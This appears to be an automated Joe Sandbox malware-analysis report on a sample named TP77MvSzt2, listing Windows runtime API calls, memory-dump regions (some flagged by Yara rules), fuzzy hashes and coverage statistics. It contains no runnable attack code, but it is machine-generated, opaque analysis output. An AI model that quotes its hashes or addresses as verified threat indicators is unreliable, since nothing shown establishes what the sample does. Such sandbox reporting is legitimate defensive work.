                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3016159387-0
                                                                                  APIs
                                                                                  • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,04840DC0,?,?,?,00000000), ref: 048427BE
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 048427CD
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048427E3
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048427F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3016159387-0
                                                                                  APIs
                                                                                  • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                  • GetLastError.KERNEL32 ref: 004126BD
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                  • String ID:
                                                                                  • API String ID: 4286982218-0
                                                                                  APIs
                                                                                  • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                  • String ID:
                                                                                  • API String ID: 1964976909-0
                                                                                  APIs
                                                                                  • TlsSetValue.KERNEL32(?,00000000,04847BF8,00000000,?,?,04840DC0,?,?,?,00000000,?,00000000), ref: 048429DE
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 048429EA
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04842A00
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842A0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                  • String ID:
                                                                                  • API String ID: 1964976909-0
                                                                                  APIs
                                                                                  • SetThreadPriority.KERNEL32(?,?), ref: 04842918
                                                                                  • GetLastError.KERNEL32 ref: 04842924
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0484293A
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842948
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                  • String ID:
                                                                                  • API String ID: 4286982218-0
                                                                                  APIs
                                                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                  • GetLastError.KERNEL32 ref: 00412725
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3103352999-0
                                                                                  APIs
                                                                                  • TlsAlloc.KERNEL32(?,04840DC0), ref: 0484297F
                                                                                  • GetLastError.KERNEL32 ref: 0484298C
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048429A2
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048429B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3103352999-0
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 3213639722-2276729525
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 0-711371036
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0486B34B,?,00000050,?,?,?,?,?), ref: 0486B1CB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 0-711371036
                                                                                  APIs
                                                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodersGdipImage$Size
                                                                                  • String ID: image/png
                                                                                  • API String ID: 864223233-2966254431
                                                                                  • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                  • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                                                  • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                  • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                                                  APIs
                                                                                  • SetLastError.KERNEL32(0000000D,?,0483E0CD,0483C8E5,?,?,00000000,?,0483C7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0483C8E5), ref: 0483F236
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1452528299-1785270423
                                                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                  • Instruction ID: fede89241af03d60d60d9f9253ce60b08d044b26c91c49780b4c68e141d30628
                                                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                  • Instruction Fuzzy Hash: 23118E3A70022AEFCF169F64EC4496EBB65FF09B16B004939FB15D6210DB70A8109BE0
                                                                                  APIs
                                                                                    • Part of subcall function 04840F85: RtlEnterCriticalSection.NTDLL ref: 04840F86
                                                                                  • List.LIBCONCRT ref: 0484DBCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterListSection
                                                                                  • String ID: +$D$11@
                                                                                  • API String ID: 2909958271-3688954461
                                                                                  • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                                                  • Instruction ID: 234f7af06bb4d2cfe7d156c535c438698ebafdaba05db754f83e5affc552a317
                                                                                  • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                                                  • Instruction Fuzzy Hash: FD211A79A00219CFCF44EF68C5849ADB7F1FF88314B158569E906EB351CB70AA45CF91
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: SpinWait
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2810355486-1785270423
                                                                                  • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                                                  • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SpinWait
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2810355486-1785270423
                                                                                  • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction ID: 34bf539309afac6b13fb13e7eb8d41dc9d9db9625dc74e7b0b8f1c1918005ea2
                                                                                  • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction Fuzzy Hash: 4E017531A5072A9FCB259F39D91C666BBD0EB81721F149E29D056C3A65C6A1F8C0CB81
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: String
                                                                                  • String ID: 11@$LCMapStringEx
                                                                                  • API String ID: 2568140703-3516914342
                                                                                  • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                  • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                                                  • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                  • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                                                  APIs
                                                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___std_exception_destroy
                                                                                  • String ID: f(@$ios_base::failbit set
                                                                                  • API String ID: 4194217158-3705395444
                                                                                  • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                  • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                                                  • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                  • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0484DCDA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0484DCE8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1687795959-1785270423
                                                                                  • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                  • Instruction ID: 2dcbf820e566526b7c45d5e149aceaa6cb09f3c7de86b82dc57a9b88601813c4
                                                                                  • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                  • Instruction Fuzzy Hash: 19F059397005195BCB04EB58DC84C1DF7E9AF85A653100976ED02D3351CBF0FD0586D4
                                                                                  APIs
                                                                                  • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: DefaultUser
                                                                                  • String ID: 11@$GetUserDefaultLocaleName
                                                                                  • API String ID: 3358694519-96072240
                                                                                  • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                  • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                                                  • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                  • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                                                  APIs
                                                                                  • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocaleValid
                                                                                  • String ID: 11@$IsValidLocaleName
                                                                                  • API String ID: 1901932003-3041995494
                                                                                  • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                  • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                                                  • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                  • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                                                  APIs
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                  • String ID: 11@$InitializeCriticalSectionEx
                                                                                  • API String ID: 2593887523-3358978645
                                                                                  • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                  • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                                                  • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                  • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catch
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 3886170330-2084237596
                                                                                  • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                  • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                                                  • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                  • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free
                                                                                  • String ID: 11@$FlsFree
                                                                                  • API String ID: 3978063606-2352678666
                                                                                  • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                  • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                                                  • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                  • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Alloc
                                                                                  • String ID: 11@$FlsAlloc
                                                                                  • API String ID: 2773662609-288891599
                                                                                  • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                  • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                                                  • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                  • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                                                  APIs
                                                                                  • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: try_get_function
                                                                                  • String ID: 11@$FlsAlloc
                                                                                  • API String ID: 2742660187-288891599
                                                                                  • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                  • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                                                  • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                  • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                                                  APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
• __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: Exception@8Throwstd::invalid_argument::invalid_argument
• String ID: pThreadProxy
• API String ID: 1687795959-3651400591
• Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
• Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
• Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
• Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
APIs
• Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
• Hash.LIBCONCRT ref: 0041A8AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
• String ID: +hB
• API String ID: 3232699325-4272926976
• Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
• Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
• Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
• Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
• GetLastError.KERNEL32 ref: 0042AF4E
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
• Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
• Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
• Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,04832ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,04832ACD,00000000), ref: 0485B1A7
• GetLastError.KERNEL32 ref: 0485B1B5
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,04832ACD,00000000), ref: 0485B210
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
• Instruction ID: 8f7d7ada0d358742ee1346f6d29cd5053f3b9cfecc53200bfa84dcebe1e6c334
• Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
• Instruction Fuzzy Hash: 4741E435600205AFDF219FA9D84467E7BA5EF11315F144B69EC59D71B0DB30B901CB61

Execution Graph

Execution Coverage: 6.9%
Dynamic/Decrypted Code Coverage: 4.9%
Signature Coverage: 1%
Total number of Nodes: 1418
Total number of Limit Nodes: 28
